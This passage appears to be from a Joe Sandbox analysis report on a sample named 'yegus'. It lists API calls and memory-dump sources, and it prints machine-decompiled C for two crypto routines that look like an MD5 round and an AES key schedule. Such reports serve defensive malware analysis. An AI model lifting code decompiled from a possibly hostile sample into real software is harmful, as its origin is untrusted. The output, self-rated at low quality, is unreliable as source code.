      • Part of subcall function 013374D2: TerminateProcess.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,?,013338A4,00000000,?,?,00000000,00000000,?), ref: 013374FD
    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 01339BF0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10088620, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
    APIs
      • Part of subcall function 100864DA: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,10086BE1,00000001,00000364,?,10084CC8,1008215D,00000000,?,?,?,1008215D,00000000), ref: 1008651B
      • Part of subcall function 10086756: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10086758
      • Part of subcall function 10086756: GetCurrentProcess.KERNEL32(C0000417,10089AEE,1009E658,0000002C,100864A7,00000016,10086C36,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 1008677A
      • Part of subcall function 10086756: TerminateProcess.KERNEL32(00000000,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10086781
    • FindFirstFileExA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 10088765
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1003B6A0, Relevance: 3.3, Strings: 2, Instructions: 752
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10079459, Relevance: 3.2, Strings: 2, Instructions: 707
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1003C880, Relevance: 2.6, Strings: 1, Instructions: 1356
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10022AD0, Relevance: 2.2, APIs: 1, Instructions: 739
    APIs
      • Part of subcall function 10022940: __alldvrm.INT64 ref: 100229E8
      • Part of subcall function 10022940: __allrem.INT64 ref: 10022A5B
    • __alldiv.INT64 ref: 10023036
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10017050, Relevance: 2.1, APIs: 1, Instructions: 558
    APIs
    • __allrem.INT64 ref: 10017406
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10078060, Relevance: 1.9, Strings: 1, Instructions: 656
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 100722E0, Relevance: 1.9, Strings: 1, Instructions: 619
    Strings
    • Expression tree is too large (maximum depth %d), xrefs: 100729C5
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01332B70, Relevance: .7, Instructions: 686Crypto
    C-Code - Quality: 25%
    			E01332B70(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t120;
				void* _t122;
				signed int _t341;
				intOrPtr _t342;
				signed int _t346;
				signed int _t348;
				signed int _t350;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t364;
				signed int _t366;
				signed int _t368;
				signed int _t371;
				signed int _t372;
				signed int _t464;
				signed int _t547;
				signed int _t552;
				signed int _t557;
				signed int _t561;
				signed int _t563;
				signed int _t565;
				signed int _t567;
				signed int _t570;
				signed int _t574;
				signed int _t586;
				signed int _t588;
				signed int _t590;
				signed int _t592;
				signed int _t594;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				signed int _t612;
				signed int _t617;
				signed int _t619;
				signed int _t621;
				signed int _t623;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t633;
				signed int _t635;
				signed int _t637;
				signed int _t640;
				signed int _t644;
				signed int _t646;
				signed int _t648;
				signed int _t650;
				signed int _t653;
				signed int _t655;
				signed int _t657;
				signed int _t659;
				signed int _t661;
				signed int _t663;
				signed int _t665;
				signed int _t667;
				intOrPtr _t668;
				signed int _t669;
				signed int _t670;
				signed int _t673;
				signed int _t675;
				signed int _t677;
				signed int _t679;
				signed int _t684;
				signed int _t686;
				signed int _t688;
				signed int _t692;
				signed int _t694;
				signed int _t696;
				signed int _t698;
				signed int _t700;
				signed int _t702;
				signed int _t704;
				signed int _t707;
				signed int _t712;

				_t120 =  *0x1347004; // 0x262637d3
				_v8 = _t120 ^ _t712;
				_t122 = __edx + 2;
				_v80 = __ecx;
				_t669 = 0;
				do {
					_t574 =  *(_t122 + 1) & 0x000000ff;
					_t122 = _t122 + 4;
					 *((intOrPtr*)(_t712 + _t669 * 4 - 0x44)) = (((_t574 << 8) + ( *(_t122 - 4) & 0x000000ff) << 8) + ( *(_t122 - 5) & 0x000000ff) << 8) + ( *(_t122 - 6) & 0x000000ff);
					_t669 = _t669 + 1;
				} while (_t669 < 0x10);
				_t629 =  *(__ecx + 0x54);
				_t670 =  *(__ecx + 0x58);
				_t341 =  *(__ecx + 0x5c);
				asm("rol edx, 0x7");
				_t586 = _v72 + 0xd76aa478 + ( !_t629 & _t341 | _t670 & _t629) +  *((intOrPtr*)(_v80 + 0x50)) + _t629;
				_t342 = _v80;
				asm("rol esi, 0xc");
				_t673 = _t341 - 0x173848aa + ( !_t586 & _t670 | _t629 & _t586) + _v68 + _t586;
				asm("ror edi, 0xf");
				_t633 =  *((intOrPtr*)(_t342 + 0x58)) + 0x242070db + ( !_t673 & _t629 | _t673 & _t586) + _v64 + _t673;
				asm("ror ebx, 0xa");
				_t346 =  *((intOrPtr*)(_t342 + 0x54)) + 0xc1bdceee + ( !_t633 & _t586 | _t673 & _t633) + _v60 + _t633;
				asm("rol edx, 0x7");
				_t588 = _t586 + ( !_t346 & _t673 | _t633 & _t346) + 0xf57c0faf + _v56 + _t346;
				asm("rol esi, 0xc");
				_t675 = _t673 + ( !_t588 & _t633 | _t346 & _t588) + 0x4787c62a + _v52 + _t588;
				asm("ror edi, 0xf");
				_t635 = _t633 + ( !_t675 & _t346 | _t675 & _t588) + 0xa8304613 + _v48 + _t675;
				asm("ror ebx, 0xa");
				_t348 = _t346 + ( !_t635 & _t588 | _t675 & _t635) + 0xfd469501 + _v44 + _t635;
				asm("rol edx, 0x7");
				_t590 = _t588 + ( !_t348 & _t675 | _t635 & _t348) + 0x698098d8 + _v40 + _t348;
				asm("rol esi, 0xc");
				_t677 = _t675 + ( !_t590 & _t635 | _t348 & _t590) + 0x8b44f7af + _v36 + _t590;
				asm("ror edi, 0xf");
				_t637 = _t635 + ( !_t677 & _t348 | _t677 & _t590) + 0xffff5bb1 + _v32 + _t677;
				_v92 = _t637;
				asm("ror ebx, 0xa");
				_t350 = _t348 + ( !_t637 & _t590 | _t677 & _t637) + 0x895cd7be + _v28 + _t637;
				_v84 = _t350;
				asm("rol edx, 0x7");
				_t592 = _t590 + ( !_t350 & _t677 | _t637 & _t350) + 0x6b901122 + _v24 + _t350;
				_v88 = _t592;
				asm("rol edi, 0xc");
				_t640 = _t677 - 0x2678e6d + ( !_t592 & _t637 | _t350 & _t592) + _v20 + _t592;
				_v76 = _t640;
				_t679 =  !_t640;
				asm("ror ebx, 0xf");
				_t354 = _v92 + 0xa679438e + (_t679 & _t350 | _t640 & _t592) + _v16 + _t640;
				_t594 =  !_t354;
				_t464 = _v76;
				asm("ror edi, 0xa");
				_t644 = _v84 + 0x49b40821 + (_t594 & _v88 | _t640 & _t354) + _v12 + _t354;
				asm("rol esi, 0x5");
				_t684 = (_t679 & _t354 | _t464 & _t644) + _v68 + _v88 + 0xf61e2562 + _t644;
				asm("rol edx, 0x9");
				_t599 = (_t594 & _t644 | _t354 & _t684) + _v48 + _t464 + 0xc040b340 + _t684;
				asm("rol ebx, 0xe");
				_t356 = _t354 + ( !_t644 & _t684 | _t599 & _t644) + 0x265e5a51 + _v28 + _t599;
				asm("ror edi, 0xc");
				_t646 = _t644 + ( !_t684 & _t599 | _t356 & _t684) + 0xe9b6c7aa + _v72 + _t356;
				asm("rol esi, 0x5");
				_t686 = _t684 + ( !_t599 & _t356 | _t599 & _t646) + 0xd62f105d + _v52 + _t646;
				asm("rol edx, 0x9");
				_t601 = _t599 + ( !_t356 & _t646 | _t356 & _t686) + 0x2441453 + _v32 + _t686;
				asm("rol ebx, 0xe");
				_t358 = _t356 + ( !_t646 & _t686 | _t601 & _t646) + 0xd8a1e681 + _v12 + _t601;
				asm("ror edi, 0xc");
				_t648 = _t646 + ( !_t686 & _t601 | _t358 & _t686) + 0xe7d3fbc8 + _v56 + _t358;
				asm("rol esi, 0x5");
				_t688 = _t686 + ( !_t601 & _t358 | _t601 & _t648) + 0x21e1cde6 + _v36 + _t648;
				asm("rol edx, 0x9");
				_t603 = _t601 + ( !_t358 & _t648 | _t358 & _t688) + 0xc33707d6 + _v16 + _t688;
				_v76 = _t603;
				asm("rol ebx, 0xe");
				_t360 = _t358 + ( !_t648 & _t688 | _t603 & _t648) + 0xf4d50d87 + _v60 + _t603;
				asm("ror edi, 0xc");
				_t650 = _t648 + ( !_t688 & _t603 | _t360 & _t688) + 0x455a14ed + _v40 + _t360;
				_v84 = _t650;
				asm("rol edx, 0x5");
				_t606 = _t688 - 0x561c16fb + ( !_t603 & _t360 | _t603 & _t650) + _v20 + _t650;
				asm("rol esi, 0x9");
				_t692 = _v76 + 0xfcefa3f8 + ( !_t360 & _t650 | _t360 & _t606) + _v64 + _t606;
				asm("rol edi, 0xe");
				_t653 = _t360 + 0x676f02d9 + ( !_t650 & _t606 | _t692 & _t650) + _v44 + _t692;
				asm("ror ebx, 0xc");
				_t364 = _v84 + 0x8d2a4c8a + ( !_t606 & _t692 | _t653 & _t606) + _v24 + _t653;
				asm("rol edx, 0x4");
				_t608 = _t606 + (_t692 ^ _t653 ^ _t364) + 0xfffa3942 + _v52 + _t364;
				asm("rol esi, 0xb");
				_t694 = _t692 + (_t653 ^ _t364 ^ _t608) + 0x8771f681 + _v40 + _t608;
				asm("rol edi, 0x10");
				_t655 = _t653 + (_t694 ^ _t364 ^ _t608) + 0x6d9d6122 + _v28 + _t694;
				_t547 = _t694 ^ _t655;
				asm("ror ebx, 0x9");
				_t366 = _t364 + (_t547 ^ _t608) + 0xfde5380c + _v16 + _t655;
				asm("rol edx, 0x4");
				_t610 = _t608 + (_t547 ^ _t366) + 0xa4beea44 + _v68 + _t366;
				asm("rol esi, 0xb");
				_t696 = _t694 + (_t655 ^ _t366 ^ _t610) + 0x4bdecfa9 + _v56 + _t610;
				asm("rol edi, 0x10");
				_t657 = _t655 + (_t696 ^ _t366 ^ _t610) + 0xf6bb4b60 + _v44 + _t696;
				_t552 = _t696 ^ _t657;
				asm("ror ebx, 0x9");
				_t368 = _t366 + (_t552 ^ _t610) + 0xbebfbc70 + _v32 + _t657;
				asm("rol edx, 0x4");
				_t612 = _t610 + (_t552 ^ _t368) + 0x289b7ec6 + _v20 + _t368;
				_v76 = _t612;
				asm("rol esi, 0xb");
				_t698 = _t696 + (_t657 ^ _t368 ^ _t612) + 0xeaa127fa + _v72 + _t612;
				asm("rol edi, 0x10");
				_t659 = _t657 + (_t698 ^ _t368 ^ _t612) + 0xd4ef3085 + _v60 + _t698;
				_t557 = _t698 ^ _t659;
				asm("ror edx, 0x9");
				_t617 = (_t612 ^ _t557) + 0x4881d05 + _v48 + _t368 + _t659;
				asm("rol ecx, 0x4");
				_t561 = (_t557 ^ _t617) + _v36 + _v76 + 0xd9d4d039 + _t617;
				asm("rol esi, 0xb");
				_t700 = _t698 + (_t659 ^ _t617 ^ _t561) + 0xe6db99e5 + _v24 + _t561;
				asm("rol edi, 0x10");
				_t661 = _t659 + (_t700 ^ _t617 ^ _t561) + 0x1fa27cf8 + _v12 + _t700;
				asm("ror edx, 0x9");
				_t619 = _t617 + (_t700 ^ _t661 ^ _t561) + 0xc4ac5665 + _v64 + _t661;
				asm("rol ecx, 0x6");
				_t563 = _t561 + (( !_t700 | _t619) ^ _t661) + 0xf4292244 + _v72 + _t619;
				asm("rol esi, 0xa");
				_t702 = _t700 + (( !_t661 | _t563) ^ _t619) + 0x432aff97 + _v44 + _t563;
				asm("rol edi, 0xf");
				_t663 = _t661 + (( !_t619 | _t702) ^ _t563) + 0xab9423a7 + _v16 + _t702;
				asm("ror edx, 0xb");
				_t621 = _t619 + (( !_t563 | _t663) ^ _t702) + 0xfc93a039 + _v52 + _t663;
				asm("rol ecx, 0x6");
				_t565 = _t563 + (( !_t702 | _t621) ^ _t663) + 0x655b59c3 + _v24 + _t621;
				asm("rol esi, 0xa");
				_t704 = _t702 + (( !_t663 | _t565) ^ _t621) + 0x8f0ccc92 + _v60 + _t565;
				asm("rol edi, 0xf");
				_t665 = _t663 + (( !_t621 | _t704) ^ _t565) + 0xffeff47d + _v32 + _t704;
				asm("ror edx, 0xb");
				_t623 = _t621 + (( !_t565 | _t665) ^ _t704) + 0x85845dd1 + _v68 + _t665;
				asm("rol ecx, 0x6");
				_t567 = _t565 + (( !_t704 | _t623) ^ _t665) + 0x6fa87e4f + _v40 + _t623;
				asm("rol ebx, 0xa");
				_t371 = _t704 - 0x1d31920 + (( !_t665 | _t567) ^ _t623) + _v12 + _t567;
				asm("rol edi, 0xf");
				_t667 = _t665 + (( !_t623 | _t371) ^ _t567) + 0xa3014314 + _v48 + _t371;
				asm("ror edx, 0xb");
				_t625 = _t623 + (( !_t567 | _t667) ^ _t371) + 0x4e0811a1 + _v20 + _t667;
				_v76 = _t625;
				_t668 = _v80;
				asm("rol esi, 0x6");
				_t707 = _t567 - 0x8ac817e + (( !_t371 | _t625) ^ _t667) + _v56 + _t625;
				 *((intOrPtr*)(_t668 + 0x50)) =  *((intOrPtr*)(_t668 + 0x50)) + _t707;
				_t372 = _v76;
				asm("rol edx, 0xa");
				_t628 = _t371 - 0x42c50dcb + (( !_t667 | _t707) ^ _t625) + _v28 + _t707;
				asm("rol ecx, 0xf");
				_t570 = _t667 + 0x2ad7d2bb + (( !_t372 | _t628) ^ _t707) + _v64 + _t628;
				 *((intOrPtr*)(_t668 + 0x58)) =  *((intOrPtr*)(_t668 + 0x58)) + _t570;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t668 + 0x5c)) =  *((intOrPtr*)(_t668 + 0x5c)) + _t628;
				 *((intOrPtr*)(_t668 + 0x54)) = _t372 - 0x14792c6f + (( !_t707 | _t570) ^ _t628) + _v36 +  *((intOrPtr*)(_t668 + 0x54)) + _t570;
				return E01333E82(_t372, _v8 ^ _t712, _t668, (( !_t707 | _t570) ^ _t628) + _v36);
			}












































































































    0x01332b76
    0x01332b7d
    0x01332b84
    0x01332b88
    0x01332b8b
    0x01332b90
    0x01332b90
    0x01332b94
    0x01332bb2
    0x01332bb6
    0x01332bb7
    0x01332bbc
    0x01332bc1
    0x01332bc6
    0x01332be6
    0x01332be9
    0x01332bfb
    0x01332c03
    0x01332c06
    0x01332c27
    0x01332c30
    0x01332c43
    0x01332c46
    0x01332c5f
    0x01332c62
    0x01332c79
    0x01332c7c
    0x01332c97
    0x01332c9a
    0x01332cb3
    0x01332cb6
    0x01332ccf
    0x01332cd2
    0x01332ce9
    0x01332cec
    0x01332d07
    0x01332d0a
    0x01332d0e
    0x01332d26
    0x01332d29
    0x01332d2d
    0x01332d45
    0x01332d48
    0x01332d4c
    0x01332d62
    0x01332d65
    0x01332d69
    0x01332d6c
    0x01332d88
    0x01332d8b
    0x01332d94
    0x01332daa
    0x01332daf
    0x01332db2
    0x01332dcf
    0x01332dd2
    0x01332de1
    0x01332de6
    0x01332dfd
    0x01332e02
    0x01332e19
    0x01332e1e
    0x01332e35
    0x01332e3a
    0x01332e51
    0x01332e56
    0x01332e6d
    0x01332e72
    0x01332e8b
    0x01332e90
    0x01332ea7
    0x01332eac
    0x01332ec1
    0x01332ec6
    0x01332eca
    0x01332ede
    0x01332ee3
    0x01332ef8
    0x01332efb
    0x01332eff
    0x01332f26
    0x01332f2b
    0x01332f3a
    0x01332f3d
    0x01332f5d
    0x01332f62
    0x01332f75
    0x01332f78
    0x01332f8a
    0x01332f8d
    0x01332f9b
    0x01332f9e
    0x01332fb2
    0x01332fb5
    0x01332fb7
    0x01332fc7
    0x01332fca
    0x01332fdd
    0x01332fe0
    0x01332fee
    0x01332ff1
    0x01333005
    0x01333008
    0x0133300a
    0x0133301c
    0x0133301f
    0x01333030
    0x01333033
    0x01333037
    0x01333044
    0x01333047
    0x0133305e
    0x01333066
    0x01333068
    0x01333077
    0x0133307a
    0x01333087
    0x0133308a
    0x01333098
    0x0133309b
    0x013330af
    0x013330b2
    0x013330c6
    0x013330c9
    0x013330dd
    0x013330e0
    0x013330f4
    0x013330f7
    0x0133310b
    0x0133310e
    0x01333122
    0x01333125
    0x01333139
    0x0133313c
    0x01333150
    0x01333153
    0x01333165
    0x0133316a
    0x0133317a
    0x01333183
    0x0133319b
    0x0133319e
    0x013331b1
    0x013331b6
    0x013331ca
    0x013331cd
    0x013331e7
    0x013331ea
    0x013331ee
    0x013331fa
    0x013331ff
    0x01333202
    0x01333206
    0x01333214
    0x01333219
    0x01333220
    0x01333233
    0x01333236
    0x01333238
    0x01333244
    0x0133324c
    0x0133324f
    0x01333262

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10007870, Relevance: .4, Instructions: 432
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10002200, Relevance: .3, Instructions: 285
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1002DD28, Relevance: .2, Instructions: 230
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 013310A0, Relevance: .2, Instructions: 220Crypto
    C-Code - Quality: 72%
    			E013310A0(signed char* __ecx, signed int* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t86;
				signed int _t112;
				signed int _t124;
				signed int _t125;
				signed int _t184;
				signed int _t191;
				signed int _t194;
				signed int _t198;
				signed int _t220;
				signed int _t235;
				signed int _t239;
				signed int _t243;
				signed int* _t244;
				unsigned int _t246;
				signed int _t252;
				signed int _t255;

				_t86 =  *0x1347004; // 0x262637d3
				_v8 = _t86 ^ _t252;
				_t245 = __ecx;
				_v68 = 0x1000000;
				_t244 = __edx;
				_v64 = 0x2000000;
				_v60 = 0x4000000;
				_v56 = 0x8000000;
				_v52 = 0x10000000;
				_v48 = 0x20000000;
				 *__edx = ((( *__ecx & 0x000000ff) << 0x00000008 | __ecx[1] & 0x000000ff) << 0x00000008 | __ecx[2] & 0x000000ff) << 0x00000008 | __ecx[3] & 0x000000ff;
				_v44 = 0x40000000;
				_v40 = 0x80000000;
				_v36 = 0x1b000000;
				__edx[1] = (((__ecx[4] & 0x000000ff) << 0x00000008 | __ecx[5] & 0x000000ff) << 0x00000008 | __ecx[6] & 0x000000ff) << 0x00000008 | __ecx[7] & 0x000000ff;
				_v32 = 0x36000000;
				_v28 = 0x6c000000;
				_v24 = 0xd8000000;
				__edx[2] = (((__ecx[8] & 0x000000ff) << 0x00000008 | __ecx[9] & 0x000000ff) << 0x00000008 | __ecx[0xa] & 0x000000ff) << 0x00000008 | __ecx[0xb] & 0x000000ff;
				_v20 = 0xab000000;
				_v16 = 0x4d000000;
				_v12 = 0x9a000000;
				__edx[3] = (((__ecx[0xc] & 0x000000ff) << 0x00000008 | __ecx[0xd] & 0x000000ff) << 0x00000008 | __ecx[0xe] & 0x000000ff) << 0x00000008 | __ecx[0xf] & 0x000000ff;
				__edx[4] = (((__ecx[0x10] & 0x000000ff) << 0x00000008 | __ecx[0x11] & 0x000000ff) << 0x00000008 | __ecx[0x12] & 0x000000ff) << 0x00000008 | __ecx[0x13] & 0x000000ff;
				_t125 = 8;
				__edx[5] = (((__ecx[0x14] & 0x000000ff) << 0x00000008 | __ecx[0x15] & 0x000000ff) << 0x00000008 | __ecx[0x16] & 0x000000ff) << 0x00000008 | __ecx[0x17] & 0x000000ff;
				__edx[6] = (((__ecx[0x18] & 0x000000ff) << 0x00000008 | __ecx[0x19] & 0x000000ff) << 0x00000008 | __ecx[0x1a] & 0x000000ff) << 0x00000008 | __ecx[0x1b] & 0x000000ff;
				__edx[7] = (((__ecx[0x1c] & 0x000000ff) << 0x00000008 | __ecx[0x1d] & 0x000000ff) << 0x00000008 | __ecx[0x1e] & 0x000000ff) << 0x00000008 | __ecx[0x1f] & 0x000000ff;
				do {
					_t112 = _t244[7];
					_t184 = _t125 & 0x80000007;
					if(_t184 < 0) {
						_t184 = (_t184 - 0x00000001 | 0xfffffff8) + 1;
						_t255 = _t184;
					}
					if(_t255 != 0) {
						if(_t184 == 4) {
							_t191 = _t112 >> 0x00000018 & 0x0000000f;
							_t235 = (_t112 >> 0x1c) + (_t112 >> 0x1c);
							_t194 = _t112 >> 0x00000010 & 0x0000000f;
							_t239 = (_t112 >> 0x00000014 & 0x0000000f) + (_t112 >> 0x00000014 & 0x0000000f);
							_t198 = _t112 >> 0x00000008 & 0x0000000f;
							_t243 = (_t112 >> 0x0000000c & 0x0000000f) + (_t112 >> 0x0000000c & 0x0000000f);
							_t245 = ((( *(_t191 + 0x13450a8 + _t235 * 8) & 0x000000ff) << 8) + ( *(_t194 + 0x13450a8 + _t239 * 8) & 0x000000ff) << 8) + ( *(_t198 + 0x13450a8 + _t243 * 8) & 0x000000ff) << 8;
							_t112 = ( *((_t112 & 0x0000000f) + 0x13450a8 + ((_t112 >> 0x00000004 & 0x0000000f) + (_t112 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff) + (((( *(_t191 + 0x13450a8 + _t235 * 8) & 0x000000ff) << 8) + ( *(_t194 + 0x13450a8 + _t239 * 8) & 0x000000ff) << 8) + ( *(_t198 + 0x13450a8 + _t243 * 8) & 0x000000ff) << 8);
						}
					} else {
						asm("rol eax, 0x8");
						_t246 = _t112;
						_t245 = _t246 & 0x0000000f;
						_t124 = (((( *((_t112 >> 0x00000018 & 0x0000000f) + 0x13450a8 + ((_t246 >> 0x1c) + (_t246 >> 0x1c)) * 8) & 0x000000ff) << 8) + ( *((_t246 >> 0x00000010 & 0x0000000f) + 0x13450a8 + ((_t246 >> 0x00000014 & 0x0000000f) + (_t246 >> 0x00000014 & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t246 >> 0x00000008 & 0x0000000f) + 0x13450a8 + ((_t246 >> 0x0000000c & 0x0000000f) + (_t246 >> 0x0000000c & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t246 & 0x0000000f) + 0x13450a8 + ((_t246 >> 0x00000004 & 0x0000000f) + (_t246 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff);
						_t68 = _t125 - 1; // 0x7
						_t220 = _t68;
						if(_t220 < 0) {
							_t220 = _t220 + 7;
						}
						_t112 = _t124 ^  *(_t252 + (_t220 >> 3) * 4 - 0x40);
					}
					_t125 = _t125 + 1;
					_t244[8] =  *_t244 ^ _t112;
					_t244 =  &(_t244[1]);
				} while (_t125 < 0x3c);
				return E01333E82(_t125, _v8 ^ _t252, _t244, _t245);
			}






































    0x013310a6
    0x013310ad
    0x013310b2
    0x013310b4
    0x013310bc
    0x013310be
    0x013310c5
    0x013310d8
    0x013310e8
    0x013310f8
    0x013310ff
    0x0133110e
    0x0133111e
    0x0133112e
    0x01331135
    0x01331145
    0x01331155
    0x01331165
    0x0133116c
    0x0133117c
    0x0133118c
    0x0133119c
    0x013311a3
    0x013311c5
    0x013311de
    0x013311ec
    0x0133120e
    0x01331230
    0x01331233
    0x01331233
    0x01331238
    0x0133123e
    0x01331244
    0x01331244
    0x01331244
